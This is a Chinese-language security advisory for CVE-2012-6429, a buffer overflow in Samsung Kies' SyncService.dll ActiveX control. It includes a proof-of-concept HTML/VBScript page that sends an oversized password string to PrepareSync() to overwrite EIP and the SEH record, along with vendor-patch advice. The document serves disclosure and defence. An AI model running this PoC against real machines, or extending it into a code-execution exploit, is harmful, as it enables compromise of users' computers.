发布日期:2013-01-09
更新日期:2013-01-13受影响系统:
Samsung Kies 2.5.0.12114_1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57249
CVE ID: CVE-2012-6429
Samsung Kies可将pc与电话连接,使您可以更方便地同步数据和查找新软件。
漏洞成因是ActiveX控件 SyncService.dll中的PrepareSync()方法对输入数据没有足够的检查。远程攻击者可以传递任意值给PrepareSync()方法的"password"参数,从而触发一个ACCESS_VIOLATION异常。利用此漏洞可成功改写EIP寄存器及SEH记录。
SyncService.dll的GUID为 { EA8A3985-F9DF-4652-A255-E4E7772AFCA8 }, 默认位置是"C:Program FilesSamsungKiesExternalDeviceModulesSyncService.dll"。
<*来源:High-Tech Bridge Security Research Lab
链接:https://www.htbridge.com/advisory/HTB23136
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v. 2.5.0.12114_1 </title>
</head>
<script language="vbscript">
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of Concept">
</body>
<object classid="clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8"id="Target"></object>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:
Samsung
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.samsung.com/kiesSchmid Watson Management Console目录遍历漏洞Colloquy远程拒绝服务漏洞相关资讯 远程缓冲区溢出漏洞 Samsung Kies
- Ecava IntegraXor ActiveX控件远程 (02/28/2013 16:06:02)
- LibTIFF "DOTRANGE"标签处理远程缓 (11/29/2012 16:06:58)
- Cisco WebEx WRF和ARF文件格式多个 (06/29/2012 05:45:00)
| - Adobe Flash Player和AIR远程缓冲 (12/14/2012 08:25:11)
- Adobe Photoshop远程缓冲区溢出漏 (09/05/2012 06:20:09)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在
|
易网时代-编程资源站